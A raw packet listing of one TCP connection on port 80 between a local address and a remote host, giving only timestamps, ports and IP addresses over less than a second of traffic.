Dec 22, 2024 02:16:53.762613058 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.762628078 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.762638092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.763330936 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.763346910 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.763364077 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.763374090 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.763381004 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.763397932 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.763561010 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.763561010 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.763561010 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.764151096 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.764168024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.764209032 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.764213085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.764226913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.764242887 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.764246941 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.764260054 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.764270067 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.764285088 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.764298916 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.765031099 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.765048027 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.765064001 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.765074015 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.765079975 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.765086889 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.765096903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.765106916 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.765115023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.765126944 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.765134096 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.765153885 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.765898943 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.765916109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.765932083 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.765940905 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.765949965 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.765949965 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.765968084 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.765973091 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.765989065 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.766010046 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.766700983 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.766741991 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.766747952 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.766765118 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.766781092 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.766784906 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.766798019 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.766799927 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.766813993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.766817093 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.766829014 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.766849995 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.767577887 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.767595053 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.767611027 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.767627954 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.767638922 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.767719030 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.767719030 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.768191099 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.768207073 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.768223047 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.768234015 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.768243074 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.768244028 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.768261909 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.768265009 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.768273115 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.768299103 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.768965006 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.768980980 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.769010067 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.769015074 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.769031048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.769035101 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.769043922 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.769048929 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.769125938 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.769125938 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.769759893 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.769826889 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.769843102 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.769859076 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.769867897 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.769876957 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.769893885 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.769911051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.769912004 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.770647049 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.770663977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.770680904 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.770689964 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.770697117 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.770701885 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.770860910 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.770860910 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.771245003 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.771260977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.771275997 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.771291971 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.771295071 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.771341085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.771341085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.771361113 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.771887064 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.771903038 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.771918058 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.771929026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.771935940 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.771938086 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.771967888 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.772078037 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.772532940 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.772550106 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.772566080 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.772577047 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.772583961 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.772584915 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.772607088 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.772618055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.773082972 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.773113966 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.773129940 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.773148060 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.773155928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.773293972 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.773293972 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.773658991 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.773709059 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.773725986 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.773735046 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.773741961 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.773742914 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.773762941 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.773777008 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.774302006 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.774374008 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.774458885 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.774477959 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.774507046 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.774507046 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.774741888 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.774856091 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.774888992 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.774930000 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.799516916 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.799568892 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.799635887 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.799652100 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.799698114 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.799895048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.800087929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.800096989 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.800113916 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.800138950 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.800230026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.800350904 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.800472021 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.948179960 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.948227882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.948297024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.948313951 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.948338985 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.948354959 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.948568106 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.948610067 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.948746920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.948764086 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.948786974 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.948798895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.949084044 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.949100018 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.949129105 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.949140072 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.949331999 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.949373007 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.949516058 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.949532986 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.949556112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.949568987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.949805021 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.949846029 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.950073004 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.950109959 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.950182915 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.950198889 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.950221062 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.950233936 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.950443983 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.950484037 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.950969934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.951019049 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.951081991 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.951101065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.951148033 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.951159954 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.951370001 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.951409101 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.951658964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.951700926 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.951837063 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.951853037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.951878071 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.951901913 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.952064991 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.952114105 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.952430010 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.952471018 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.952547073 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.952564001 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.952584982 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.952596903 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.952841043 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.952881098 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.953200102 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.953242064 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.953321934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.953337908 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.953361034 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.953372955 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.953639030 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.953679085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.953986883 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.954025984 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.954109907 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.954128027 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.954150915 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.954161882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.954394102 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.954437971 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.954777956 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.954814911 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.954953909 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.954971075 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.954994917 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.955007076 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.955235004 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.955281973 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.955543995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.955584049 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.955673933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.955691099 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.955717087 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.955728054 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.955945969 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.955982924 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.956362963 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.956412077 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.956453085 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.956470013 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.956492901 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.956504107 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.956748962 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.956788063 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.957137108 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.957175016 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.957241058 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.957257986 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.957283020 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.957299948 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.957523108 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.957561970 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.958029985 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.958070040 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.958163023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.958178997 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.958203077 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.958214998 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.958410025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.958446026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.958709955 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.958750010 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.958832979 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.958848953 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.958874941 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.958874941 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.959115982 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.959153891 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.959505081 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.959546089 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.959634066 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.959650040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.959671974 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.959683895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.959911108 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.959949970 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.960294962 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.960338116 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.960437059 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.960453033 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.960475922 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.960488081 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.960726976 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.960764885 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.961039066 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.961076975 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.961160898 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.961178064 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.961203098 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.961215019 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.961457968 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.961497068 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.961846113 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.961885929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.961977959 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.961993933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.962014914 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.962027073 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.962259054 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.962307930 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.962630033 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.962671995 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.962723017 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.962739944 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.962763071 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.962774038 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.963012934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.963052034 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.963430882 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.963474989 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.963552952 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.963568926 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.963593960 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.963608027 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.963844061 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.963886976 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.964268923 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.964323997 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.964386940 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.964402914 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.964427948 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.964447021 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.964672089 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.964710951 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.965002060 CET	80	49872	31.41.244.11	192.168.2.4
